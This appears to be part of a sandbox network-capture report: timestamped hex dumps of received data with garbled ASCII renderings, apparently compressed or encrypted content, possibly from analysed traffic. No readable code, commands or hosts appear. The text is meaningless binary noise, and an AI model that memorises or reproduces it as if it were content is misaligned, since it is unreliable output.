                                                                                                                                                                                                  2021-11-18 09:30:32 UTC588INData Raw: 9a 78 ae 76 59 cb 18 cd 41 50 bb 9e 71 82 7d 08 99 f2 63 64 5b e9 fc cc c5 ed 07 27 ea 5e af b5 df b2 02 10 e4 ed 87 20 13 67 c6 d5 9b d2 ae 8f 0b 72 e2 ac fb d4 d6 de 4b 55 22 c0 f0 29 eb c2 7b 4e ac d9 6b 36 5a 5e ae db 8a 22 ef 23 7c c6 62 d3 cf 06 db 55 f4 55 93 62 de 4d 31 8a bd c5 1c ef 46 0e f5 21 d8 0a 21 31 dc af f3 22 0e 9b 4d 6e 24 ba 64 32 de 47 8d 06 b7 f6 43 09 8c e5 40 be 7b 85 ea 55 7e e6 e2 f6 38 93 75 ff a2 82 e9 d3 54 42 9a 7c d9 eb f6 24 e7 c9 2e 37 57 74 df d5 da 47 9c 43 a4 86 f1 8e e1 f9 4d be 30 3f 1a d4 cf c9 20 4c b2 d9 17 d9 3b cd 73 a2 ac f3 b4 d1 dc ff 19 66 c8 7f b1 7f d9 6c d6 14 aa 2d 88 e7 fa 78 de 23 ec 5c 7e ef 63 5c 43 fd e7 9d c1 e4 d6 0d d6 f5 73 2e d7 b5 06 f9 aa d5 41 d6 2b ad 77 ed 34 dc fa 94 fd dd 62 64 aa 55 cc
                                                                                                                                                                                                  Data Ascii: xvYAPq}cd['^ grKU"){Nk6Z^"#|bUUbM1F!!1"Mn$d2GC@{U~8uTB|$.7WtGCM0? L;sfl-x#\~c\Cs.A+w4bdU
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC592INData Raw: f5 2f af 08 66 a6 a4 67 90 be 0b c6 3b e9 de 4e b7 96 57 04 b3 9c bd de c1 48 7e 3f f9 a9 30 ce 49 67 bf 2f d5 cd a4 ee 40 24 bf df 7d 85 77 d6 2b de ce f8 1e af 08 66 c6 17 7a 07 22 f9 fd 56 0b 6f a7 7d 83 57 04 b3 ac 77 bc 03 e5 f2 2d 82 fa bb 60 bc d5 c2 1f 0b 8b 9d 69 de bb 6e 17 c6 e8 e2 e5 98 f4 bd d0 97 f4 8f e1 76 95 c3 9a 5a 79 13 9d 35 5e 11 3c e1 ac f1 af 27 2f d0 44 b5 42 0f 82 53 e8 3b 6e b6 b7 06 c6 38 9f 7b 87 9d 42 2f 61 f2 63 9d 0b de 9b e4 7f 05 f3 9d 42 19 60 da 2e 80 02 ea 0e 51 7e 86 f4 22 93 3f 18 ef 2b 03 e2 7d 7d a7 5a 86 b7 00 0a e2 fb bd 43 f1 be de 19 d2 8b 4c fe a0 da 89 6e bb ca a0 63 73 0d fd 52 d2 17 51 63 f0 e1 aa 31 fe 7f 68 1b b4 47 e7 d7 b0 f2 fc 65 b0 04 66 92 4f 33 79 cd 34 a8 6b 98 00 9f c1 fd d0 d1 d4 4d 4d 6a d6 2b
                                                                                                                                                                                                  Data Ascii: /fg;NWH~?0Ig/@$}w+fz"Vo}Ww-`invZy5^<'/DBS;n8{B/acB`.Q~"?+}}ZCLncsRQc1hGefO3y4kMMj+
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC596INData Raw: 27 65 7a a9 8c 8a 15 c9 c2 e0 47 32 2d a0 4a 49 ab 25 5f 38 6a ca d3 36 f0 4c c5 91 46 55 45 be ff 12 39 fe 07 2a 4d a6 5a 22 eb 6d 4e cf 5c f8 8e d0 4f b8 fb ef cf 63 8e a6 bc d9 02 db 76 cc ad 7d 35 df 3c 9a c0 df 4e 3b a8 75 d8 dc 95 70 c4 c9 03 57 48 f3 5c 70 58 b3 77 97 a3 a5 10 73 77 c2 f8 66 f1 ee e2 78 52 6b e3 07 be b5 c2 fa 41 6c e6 31 bb 47 7a 0c 7d af 33 25 2d e8 15 ca 71 7c d7 9c 5a 2b bd 75 a6 a4 19 d5 a6 17 94 b4 b8 43 53 a1 d0 cb 8e ff cb bd af 77 f4 86 cd 50 df 4a ff de ee b9 77 1b 34 ed f7 7f f6 eb 3d 38 aa ea 8e 03 f8 6f f7 3e 76 13 20 86 87 e1 a9 5e 10 43 a0 21 24 11 0c 86 f0 48 80 18 79 08 a6 b1 53 63 81 3c 76 37 59 08 d9 b8 49 60 76 8a 29 d3 28 23 04 e8 50 08 b6 41 5b a1 d5 01 65 98 8a 3a 2a ed 38 d5 61 c0 16 f8 a3 d6 d6 be ec 14 46
                                                                                                                                                                                                  Data Ascii: 'ezG2-JI%_8j6LFUE9*MZ"mN\Ocv}5<N;upWH\pXwswfxRkAl1Gz}3%-q|Z+uCSwPJw4=8o>v ^C!$HySc<v7YI`v)(#PA[e:*8aF
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC600INData Raw: 94 d9 96 db 35 c9 5c 15 f9 38 de 6f 6a 46 de 5a 05 90 6f 6a 44 de 5a 21 18 0b 63 20 08 a3 21 0f 72 61 14 8c 84 1b 20 d5 54 8f d0 11 3a 40 0a b4 87 76 d0 16 92 a1 0d 5c 6f aa 45 de a7 ad a1 15 d4 84 1a 50 1d aa 41 55 a8 62 74 53 4a 5c 95 21 06 2a 41 34 5c 09 15 4d 95 c8 ad ae e0 1d 2c bf 53 df aa 6f d4 39 75 56 9d d1 ed 3c a1 8e ab 63 ea a8 3a a2 0e ab 43 ba 2d 9f aa 4f d4 0e b5 5d 6d 53 5b d5 16 f5 8c 6e c5 d3 aa c4 35 99 2b 3d de d4 88 bc e5 ef e3 e2 dc 0b e3 e0 1e 08 43 17 e8 cc 75 48 03 2f dc 04 37 42 27 5e 72 1c c4 c2 55 11 36 3b 8e 63 1b af bb 68 87 63 eb 3f 77 b6 b5 57 39 8e c5 5a 26 c0 ed dc f5 db 58 59 5f e8 03 bd a1 17 f4 84 5b a1 07 dc 02 dd 21 03 6e 86 74 e8 06 5d a1 11 34 64 f1 1e 70 43 03 48 80 fa 50 0f ea 42 1d a8 cd cb ac 05 f1 de c5 f2 4f
                                                                                                                                                                                                  Data Ascii: 5\8ojFZojDZ!c !ra T:@v\oEPAUbtSJ\!*A4\M,So9uV<c:C-O]mS[n5+=CuH/7B'^rU6;chc?wW9Z&XY_[!nt]4dpCHPBO
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC604INData Raw: bc 78 55 34 22 f2 52 a3 e9 44 c4 4c 50 c4 d2 1a f5 3d 98 61 1c c9 cc 54 7d 8f ce c0 4c c4 45 1e 7c 5c 2d 35 25 18 4d eb 6d ed 7c 62 c2 d7 46 fb b3 5d d5 7d 7e 1e 8a 53 f9 e2 9a 9e 8a 8b 2e 69 5e 5e 76 84 a6 f3 cb 19 a5 17 ad 6d 84 75 d6 58 ac dc 19 70 a9 ba e2 b3 c5 45 b7 88 50 63 f4 a3 85 6b 48 f0 52 bb 24 14 1d 0d d7 a8 3a f3 21 6b 46 b3 58 16 62 34 2c 0e 01 5b a0 b6 4e 48 36 e1 5a 5b e7 f3 c7 fd e6 e7 7f a4 e4 b3 72 72 04 b8 6b 48 2c 2f 11 b9 9c cc 79 3e 31 35 d3 5a 24 54 a6 46 53 91 21 09 0e 0b ea b0 12 b4 a2 5d 38 4f 45 d4 c2 9a 98 3c 5c a2 9d 75 59 c9 16 a0 37 97 38 85 c2 48 4a 74 b1 44 e5 58 a4 ea 5a 4a 8b 6b b4 87 42 8b 74 b1 36 51 6b d9 df 86 26 ad a1 71 a9 2e bb 6d ed 92 e6 61 c8 d4 67 9b 88 c3 4f 72 16 28 b5 b4 07 63 e5 be 6c 5b 25 9e 2f 71 0e
                                                                                                                                                                                                  Data Ascii: xU4"RDLP=aT}LE|\-5%Mm|bF]}~S.i^^vmuXpEPckHR$:!kFXb4,[NH6Z[rrkH,/y>15Z$TFS!]8OE<\uY78HJtDXZJkBt6Qk&q.magOr(cl[%/q
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC608INData Raw: 23 e1 88 4d 15 08 e2 73 c1 e8 57 5c 9c b4 5d 7a df 1c 0c 86 5a a3 36 ac 93 de 65 58 0d 4d 6b 58 86 c8 ae 39 ff b5 87 0f f4 ef fd c6 3b 84 e1 cd 54 2c 16 bf eb f2 38 c9 97 5e fc eb eb d3 3b 7a 5d 0d 8c a9 0b b4 15 36 95 38 93 d3 d6 f0 d9 d9 4e 4b bc 86 9f af 18 bc ed 63 96 14 9b a3 f8 d0 18 2f 1b b4 ba 3d eb ae 93 18 08 85 d6 35 88 97 82 2c a9 6e 38 b4 d5 5d 62 b2 aa d4 f9 62 b1 44 d4 77 8a 8d ba 50 17 b3 1e 1d c6 b8 85 e3 dd ac d4 d5 62 72 45 bc 91 8c 8b d1 7b 73 e1 48 4e 90 6f 99 0a 6e e2 17 6a a3 2b ea 0d 8b 6e 6d a0 59 2c 7c 21 32 e8 61 5b 63 09 eb d2 6e ad 11 46 05 56 0a f5 cb e6 dd a5 31 5f 7f 40 18 8f e2 97 e5 ba c2 27 5a e8 28 c8 4e f5 38 cd 42 47 ad 47 a8 7e 4d 9d 50 3a 2c a9 5c 37 bc 1b 5c 0f 36 3b 8e 7a 0a fa 00 d4 cf 15 a4 05 7b e3 85 72 3f 0f
                                                                                                                                                                                                  Data Ascii: #MsW\]zZ6eXMkX9;T,8^;z]68NKc/=5,n8]bbDwPbrE{sHNonj+nmY,|!2a[cnFV1_@'Z(N8BGG~MP:,\7\6;z{r?
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC612INData Raw: 41 4f 76 69 5e 8a 3e 6d 5c a6 b7 d8 6d bc 77 46 6a ac ee 08 15 05 9a 56 d7 99 53 4c 92 9c 98 92 e8 2a f2 a4 58 73 8a dd 26 6b a2 2c 99 52 c2 2b 61 dd 3f 23 ff 61 24 75 20 86 fa 29 eb 2d e4 a6 a3 08 27 36 b6 fb 0d a3 94 e7 6a b6 3c 06 27 fc fd 23 75 fb 61 56 ac 7e 8d 99 95 12 67 a7 f0 a9 60 70 14 64 65 07 1c 06 c1 69 ca 2a f3 f9 4a f1 59 96 e8 09 fa fd e5 d9 89 89 d9 e5 7e 7f d0 93 28 1c 88 a5 53 fe 62 62 6a a2 ac 83 69 77 43 fe 8a 1c b3 39 a7 c2 1f a8 cc 35 9b 73 2b 95 0c 9a 16 fe 9b 30 28 78 c8 45 b6 d7 2d 74 94 ed 3e 62 35 a6 b9 c9 72 f1 3c 0c 3a a7 9d 83 98 f7 cb 53 86 8d 18 d4 5b dd b6 5e 5d 72 7a 8e 33 c3 6b 11 a4 ad 96 9c d2 bc dc 89 1e f3 51 df e4 aa f2 8c 53 86 24 3d 8e ac c5 28 a4 fe 2a 27 60 d7 e9 ec 01 ec c3 fe c8 75 e1 38 3f 84 ac 37 8e 5c af
                                                                                                                                                                                                  Data Ascii: AOvi^>m\mwFjVSL*Xs&k,R+a?#a$u )-'6j<'#uaV~g`pdei*JY~(SbbjiwC95s+0(xE-t>b5r<:S[^]rz3kQS$=(*'`u8?7\
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC624INData Raw: e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 38 8e e3 fe 8d 1c 42 74 ba 2c a6 48 24 3a ba 88 38 e1 14 6d 44 2f 31 5e 88 96 47 dd 7b 44 53 f3 5d 11 2f 56 d1 ab 46 09 67 1b f3 d5 3a 6e 2a 26 d0 99 c3 3a 17 8e 38 e7 54 fb 58 13 ed b5 99 f6 71 0c 1d 2f b2 8f 63 e9 78 9d 7d dc 54 e4 6b db 68 a6 23 a6 19 ad d9 2e c6 69 1f 3b 44 7a ac cb 3e 76 8a f8 d8 3c fb 58 a3 f1 12 fb 38 86 8e eb ec e3 58 3a 9e 63 1f d3 7e 62 37 8a a5 42 8a 3e 22 5b f4 16 b9 74 54 2a 0c e1 15 21 11 10 61 aa 52 44 68 ac 98 8e 42 22 68 bd 7a 68 c4 a0 a3 3a 91 45 ef 14 0a 3f fd 91 a2 8c c6 aa 44 35 bd 17 b6 ce 74 52 a7 d9 13 e8 d5 47 33 5b 89 12 3a aa a0 11 5d 4c a4 19 a3 68 35 9d d6 28 17 f5 d6 91 14 23 68 e5 7a 5a 37 6a dd d1 4f 47 55 d6 4e 24 15 a0 39 f5 74 ed b1 7b c8 e3 7b ce 16 7d e9
                                                                                                                                                                                                  Data Ascii: 888888Bt,H$:8mD/1^G{DS]/VFg:n*&:8TXq/cx}Tkh#.i;Dz>v<X8X:c~b7B>"[tT*!aRDhB"hzh:E?D5tRG3[:]Lh5(#hzZ7jOGUN$9t{{}
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC640INData Raw: b9 17 c8 60 ef 5c f5 31 c6 fa 29 ed 9a d8 b6 e7 a3 ed ac 63 22 e3 88 1d 8b f9 06 0f 93 0f 93 ff 99 43 cc 7d 25 6b 70 f9 6c 56 ae 1a 8f bb d8 e5 c4 47 a5 19 77 40 4b 33 2a fa c4 fc 18 ad 1b 70 9f ac e2 fd 12 77 c2 02 f2 84 ee f4 bd 42 c7 a2 6e b1 d4 61 8c 52 fd 8f f3 50 c9 1e 57 da f3 50 26 e7 b5 2f da 56 38 a6 d3 ef b4 60 12 cf 31 0b 5d b9 9e b9 14 42 0b e8 05 02 03 4d 31 df d4 36 0f 53 c6 6c 82 9b f4 99 f5 16 42 a9 ee a3 63 3e f3 ad 00 81 56 d0 2c 95 62 8f 1d 6a b7 6f 50 73 dd 87 ac 6d 2a ec fe c7 74 87 35 f8 c2 80 2c c4 96 f8 84 a3 21 e4 bb 3d fd 99 2b e7 58 9b ab 9d 20 d5 5d 6e 57 cc 9b f8 b0 b2 d8 fa 50 68 fd e8 fe 78 2d f4 51 db fe e3 6c 6f ed 3e 0e 7d 71 88 92 b9 04 7b f8 e7 02 68 1b f5 f5 62 ee 8f 8d d4 27 79 7b 3f 47 f2 3e f4 0a f9 fc 22 47 f2 be
                                                                                                                                                                                                  Data Ascii: `\1)c"C}%kplVGw@K3*pwBnaRPWP&/V8`1]BM16SlBc>V,bjoPsm*t5,!=+X ]nWPhx-Qlo>}q{hb'y{?G>"G
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC651INData Raw: 88 6d d8 8a 07 b0 05 f7 e3 3e 6c c6 bd d8 84 7b 70 37 ee c2 46 6c 40 07 da 91 c1 9d b8 03 b7 e3 36 38 b8 15 b7 e0 66 ac c7 4d 58 87 1b 71 03 ae c7 75 58 8b 6b 71 0d ae c6 55 b8 12 57 e0 72 5c 86 4b 71 09 2e c6 45 b8 10 17 e0 7c ac c1 6a ac c2 4a 9c 87 7f e1 5c 9c 83 15 f8 27 96 63 99 d5 32 b2 4d a8 7f a1 fe 85 fa 17 ea 5f a8 7f a1 fe 85 fa 17 ea 5f a8 7f a1 fe 85 fa 17 ea 5f a8 7f a1 fe 85 fa 17 ea 5f a8 7f a1 fe 25 0e 7a 80 d0 03 84 1e 20 f4 00 a1 07 08 3d 40 e8 01 42 0f 10 7a 80 d0 03 84 1e 20 f4 00 a1 07 08 3d 40 e8 01 42 0f 10 7a 80 d0 03 84 1e 20 f4 00 a1 07 08 3d 40 e8 01 42 0f 10 7a 80 d0 03 84 1e 20 f4 00 a1 07 08 3d 40 e8 01 42 0f 10 ea 5f a8 7f a1 fe 85 da 17 6a 5f a8 7d a1 f6 85 da 17 6a 5f a8 7d a1 f6 85 da 17 6a 7f 4f f7 e1 bd fc 68 d8 d3 2f
                                                                                                                                                                                                  Data Ascii: m>l{p7Fl@68fMXquXkqUWr\Kq.E|jJ\'c2M____%z =@Bz =@Bz =@Bz =@B_j_}j_}jOh/
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC667INData Raw: c8 e1 aa dc 44 15 44 74 58 d3 3b cd 7a 62 7b 62 88 dc 1c f3 98 2f 04 54 18 8d 2c 6a 62 44 c7 01 21 24 23 0b 2e 09 35 71 80 2f 01 cf 12 9d 67 32 60 a9 e0 6b 7c 87 b5 00 3f b9 7d 4e 96 15 02 d2 ba 2e e8 cd 7a d1 6b c6 0e a1 53 14 15 27 2b b7 54 1e 6d 8c 6d 8f c5 a7 a3 0f ef 81 94 c5 a4 07 bf 09 ca 16 db ed 0f ff 1d 9b 8e 46 ab 61 da 49 be 90 44 05 06 9a 23 67 66 8e d0 51 ec 25 0c 84 c7 e6 a8 66 24 5e 81 48 4c eb fe f1 97 71 fe 32 5a 01 2d 98 a5 b9 c5 f2 c0 00 61 9d 20 44 c4 d7 5b 2d 27 96 9c 4e 29 54 6d f1 0c e4 cb b2 1e 93 b5 75 d6 01 03 9d 09 a0 95 f6 50 59 1f 9b fc 4a 32 f9 7f 28 02 bf c2 6a 14 e1 36 d3 07 f8 44 df 68 6a 5c 83 3a 08 64 4e ff 37 8f 47 87 7b 13 ce 5d b4 d9 a5 41 de c8 30 bb 5d d9 75 39 29 bc 21 9f 12 0e 1a 0c 34 6a 43 fe 73 80 3c df f8 06
                                                                                                                                                                                                  Data Ascii: DDtX;zb{b/T,jbD!$#.5q/g2`k|?}N.zkS'+TmmFaID#gfQ%f$^HLq2Z-a D[-'N)TmuPYJ2(j6Dhj\:dN7G{]A0]u9)!4jCs<
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC683INData Raw: f1 d7 65 85 cc f5 6a 9d 0e 91 07 51 e6 74 90 7d 28 c6 7e ec c5 26 94 aa 5d ee 3d 52 67 f5 90 c9 d6 38 b9 db be 51 66 30 c7 1d c8 59 26 6b dc 37 59 7f cd 95 75 5a cf 74 ca fe 12 e3 50 89 95 d8 18 ae c7 1a 2f cf 5a 55 bc ef d9 b2 36 b2 42 b6 d2 cf f5 be 97 32 78 4b 1e f7 b5 97 55 56 84 bc 71 15 6d c8 95 6d 86 55 e5 d5 a6 38 2f ca 9d 38 42 fd 8b 82 63 92 6f b1 72 26 96 63 a9 1e 4b 9d 5b a6 71 89 c6 dd 7e 1d 1d e4 01 1c 64 be ab a4 af 95 76 b1 2c 77 a2 f2 75 d6 6f 95 f6 3c a9 b0 37 c8 48 fb 9f 6a 81 8c bc a8 5c bd 2c 67 fe ad 60 fe 1d 11 2e 67 3f c1 b1 be 32 da 5a 4e fb 96 cb 2f 30 19 b9 98 82 22 0c c0 97 d4 48 5c 89 ce e8 81 6b 30 01 57 60 38 7a a1 b7 5e df 07 57 eb 75 1d fd f4 42 79 1f fb b1 18 bd b0 14 8b 30 13 fd d5 02 8c c6 58 94 61 12 56 60 0c e6 e0 26
                                                                                                                                                                                                  Data Ascii: ejQt}(~&]=Rg8Qf0Y&k7YuZtP/ZU6B2xKUVqmmU8/8Bcor&cK[q~dv,wuo<7Hj\,g`.g?2ZN/0"H\k0W`8z^WuBy0XaV`&
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC699INData Raw: 27 09 f8 0f 09 dc 07 94 87 a2 04 0e d9 dc 95 c9 57 01 37 44 2d 5b d4 ba a0 78 18 2a 4e 71 da 02 25 38 55 79 0f 10 8d c6 c9 c2 b2 4e bc 6d 90 62 f1 91 eb 1e 9c 34 16 a4 ec 15 2d 8d 08 10 a0 c2 2d 2f 00 05 fc ac 79 9f ef d2 98 f3 d4 2e 28 b0 12 68 e0 a5 16 d5 e3 f1 d3 07 45 43 b9 67 74 a2 3d f4 28 7b 13 9c 7d 48 dd 50 43 91 22 49 de de 71 5b 28 90 8c b5 17 69 e8 ee 52 09 3e 4b 9a 90 4a f5 f6 cc eb 84 2a 43 69 11 10 aa 9d ff 98 c4 4b b7 ff 78 a8 c6 b2 54 5f 23 4d 50 c8 75 7b aa 76 42 e9 70 95 cd 53 ae 53 20 1f ed 0b 07 50 89 e2 1e a8 21 ff e1 bb 02 b1 a9 3b 28 94 a6 94 63 27 14 8d 5d 61 54 9f 96 7f 9b 1b 9c d5 e7 d0 0b c5 43 95 96 73 f4 c1 52 6e 8b 55 50 9e ac 6d f5 61 8d a5 60 65 54 89 5d b4 24 04 e4 47 6f b4 64 2c 07 99 bd 7d 2d 4d bc 24 f8 52 7b 69 f1 58
                                                                                                                                                                                                  Data Ascii: 'W7D-[x*Nq%8UyNmb4--/y.(hECgt=({}HPC"Iq[(iR>KJ*CiKxT_#MPu{vBpSS P!;(c']aTCsRnUPma`eT]$God,}-M$R{iX
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC715INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC731INData Raw: 0f 2d b6 3f 4e d5 42 51 5a a3 b3 16 e2 64 b7 fd 27 01 db fe 2e e1 52 7c cc 44 21 09 1b 5c 1a 69 de 30 eb 51 66 99 3b ba 67 15 4b 23 07 d9 b0 3b a7 ca 50 8a 8c 87 5a ce 64 69 ea 34 17 ea 67 2b 84 ce d4 aa 1f 81 11 03 05 29 de 31 f6 52 ee 8c 7f e8 c8 60 68 8a 05 6d ca 64 8b 45 28 10 c2 36 3b 75 16 33 96 da 25 11 22 31 fc 21 d6 64 03 37 99 f2 3a 89 be e6 26 2e 31 de b8 c7 05 68 98 21 4c f6 01 ff 3b 32 28 eb 5c 4d cb 09 b2 c5 c8 2d 9a 2b d5 9a 52 75 0f 02 0e 75 1c 23 b4 34 06 26 29 d6 10 5b 39 d9 93 e5 15 2b 8d ee a9 9c 65 6b 66 b5 90 c7 9c f1 62 01 ce a2 e6 ee 24 56 83 72 d5 ba e8 de ae 6b de df 20 83 4a c6 ac 84 b6 60 b6 fb 17 3b 99 f9 f2 d1 33 4b c6 16 25 ff e0 51 1b 83 e9 51 aa 2f 08 0a f4 4a 42 04 7c a2 26 1e 13 0e 0b 1d aa dc a2 40 37 a9 df c6 1b cd 16
                                                                                                                                                                                                  Data Ascii: -?NBQZd'.R|D!\i0Qf;gK#;PZdi4g+)1R`hmdE(6;u3%"1!d7:&.1h!L;2(\M-+Ruu#4&)[9+ekfb$Vrk J`;3K%QQ/JB|&@7
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC747INData Raw: 5a 25 d6 46 b4 64 33 35 dc 8b 35 6a 40 0f cf 0b de 59 16 9f 09 a5 31 cc d6 9d 50 31 2d cc b4 4e c1 64 53 8d 6d 3e e5 57 f6 b2 7d 58 66 a5 8d 09 89 c6 71 89 8b 8a 17 71 b1 ac 3d 2e 32 c2 ef 30 5e 86 52 72 f8 5b 1c 29 c7 fa 76 0b 61 8a 1e 09 e6 7c bc 69 42 c4 c2 2a dd 5a 0c 9e 3a 47 89 61 80 eb 8b 66 6b 4a 02 e0 ea 98 89 fc 58 2d 0b 1b 6c 3d 4e c5 cb 7b 5a 37 35 ce d2 cb 51 17 e7 75 2d 02 66 1d 5c 89 13 e7 30 9d 65 ac c2 a8 cb 2b 99 0b 09 75 c6 93 2e 01 df 07 c9 fd 31 1a ac 6c e2 a1 21 d7 2e 74 50 e6 1e 27 06 4c 9c 50 e7 7c 09 5c c7 ed cb 2a db 77 91 21 09 84 c1 9c 62 cc d1 ee 69 db b3 3b 4f 8a 5b 6b 66 4e b7 23 fa 02 1f 66 f4 68 10 8c df 44 1a 26 bd b9 79 1d 16 33 9d 9a 53 f7 4c 42 97 e2 14 74 6d e4 21 05 ef 75 a8 c3 b7 65 28 a8 b7 a5 84 f6 49 49 db 45 55
                                                                                                                                                                                                  Data Ascii: Z%Fd355j@Y1P1-NdSm>W}Xfqq=.20^Rr[)va|iB*Z:GafkJX-l=N{Z75Qu-f\0e+u.1l!.tP'LP|\*w!bi;O[kfN#fhD&y3SLBtm!ue(IIEU
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC763INData Raw: 6d 21 1f 16 c9 c4 10 e6 4d 4b b4 da 21 5e f1 ae 32 2c db dd 30 2c 37 29 4e f2 74 4e ac 3f 2e fa aa 03 b5 e6 45 7a 2b 25 f3 37 a5 98 18 01 37 b7 1b 1d 29 36 b8 5e 11 50 4e 12 db d9 be 68 26 84 09 37 e8 66 2d e6 f4 c2 e4 1f a8 d4 cb eb d5 e2 5c f1 99 49 c6 6f 98 c5 84 55 2c 09 c2 0a 89 f2 80 7c 9e 52 58 36 79 31 95 dd 11 13 66 41 df 54 fd f5 f2 71 0b a5 08 04 01 3f b0 84 e9 b5 c6 8f f4 d3 d0 64 e7 c0 c2 66 31 39 05 95 51 5a 60 89 db 29 30 b4 1b d1 ce 2e ec a5 a2 ee a9 63 d7 59 23 65 f6 65 cb eb f3 15 4b fa ca 8d 38 b9 59 dc 84 c1 1f ae 29 b7 66 e4 40 c6 f2 ac c1 28 21 d1 b3 2c 29 c6 dc c9 e2 04 dc 98 cc 2c 03 60 18 28 6c e2 0e 57 b5 b2 52 70 50 12 21 da b9 ab 35 42 a1 b6 6e 28 df 01 b5 dc de 62 89 de d7 70 e0 5b df 34 6a ba cc 56 8b 6a 17 9a 19 25 10 f3 29
                                                                                                                                                                                                  Data Ascii: m!MK!^2,0,7)NtN?.Ez+%77)6^PNh&7f-\IoU,|RX6y1fATq?df19QZ`)0.cY#eeK8Y)f@(!,),`(lWRpP!5Bn(bp[4jVj%)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC779INData Raw: d5 04 33 ee ff cb ce 5e f6 56 12 f7 05 e8 09 96 a8 10 4b 8b 23 21 e7 27 5f 4e 21 7e c7 97 98 6e ef 39 bd 1a 85 89 eb 79 7b 49 57 66 7a 27 01 cf f7 84 ba 9c b2 c7 ca ee 1d 28 71 2d 31 da f0 bd b1 91 6f c9 ff 5b 05 2f d1 24 a7 59 84 2e 8a 3c 27 67 c5 14 88 ef 75 49 f4 ce 64 c6 d9 c0 3f a2 d8 c9 e6 5d d9 da 4b 32 18 5f e2 d7 42 38 d6 00 c8 88 a5 ba a6 fe 55 67 21 cb fb d8 14 f6 d3 d3 34 7c f1 0b 78 b5 4a ef cb 93 48 4b c5 01 d7 dd 9c 44 04 cb 91 35 d6 56 fb b1 69 7a e8 82 5a 8b af 12 f7 99 a8 ea a5 84 66 32 58 c6 96 a0 4c 09 c0 72 a2 92 f7 0b a8 e1 be 39 6a 2c ba 80 b5 94 9e b5 c2 97 3a 17 42 54 f6 92 5b b4 86 84 e0 aa 7f 7c 2e e7 bf bb 59 20 4d a8 22 71 8b dc 65 b9 32 5c 09 55 b3 e3 c2 df ce 50 80 8d e7 64 99 65 6b f0 6b 95 16 50 f9 45 12 16 26 fb d8 f6 e9
                                                                                                                                                                                                  Data Ascii: 3^VK#!'_N!~n9y{IWfz'(q-1o[/$Y.<'guId?]K2_B8Ug!4|xJHKD5VizZf2XLr9j,:BT[|.Y M"qe2\UPdekkPE&
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC795INData Raw: 79 22 49 62 50 79 d5 4e c9 39 ee 58 34 8b 0e 84 fd 0b 89 c1 31 6b 9c 3a 34 9e 0a d6 ff fd 93 d7 fb 9d c1 7a d9 e7 3c a7 c5 09 c7 98 19 2b 4a 0e f9 d5 c9 1c e6 38 25 cf 24 b1 b1 04 72 5c d6 b9 dc 4e bc be f5 b0 8d de 97 76 e8 25 76 5e 2f d2 8b 97 76 e7 e7 21 69 5d 32 1c fd 8b 20 9b e0 c3 fe d2 c6 d5 71 06 69 5d b2 0e e6 08 2e ee dc 72 72 c6 22 c9 ae 21 57 33 59 4b 92 f9 6e 4a 36 95 18 b6 70 3d 2f 49 9c 61 88 38 ce 99 89 01 2b e3 90 6b ac 1c b6 95 09 bd 7b ab 89 29 fe f5 5b 50 a7 29 e2 53 31 3c 12 de 29 ff 64 de fa e4 37 f6 84 95 b2 1e f1 53 a0 1f b5 32 d9 7d 71 3a 92 11 e2 9d c5 f6 9c 39 b5 6b 8c 1e ee 5f ac 28 7f 09 48 de 31 a2 dc f9 9d a2 fe 72 01 4a be ec ad f5 ae 17 5b 74 a8 e3 dc 2d 29 d4 fd cf ab 49 79 23 4b f6 f6 25 96 ae a2 04 14 65 95 2b c0 57 3c
                                                                                                                                                                                                  Data Ascii: y"IbPyN9X41k:4z<+J8%$r\Nv%v^/v!i]2 qi].rr"!W3YKnJ6p=/Ia8+k{)[P)S1<)d7S2}q:9k_(H1rJ[t-)Iy#K%e+W<
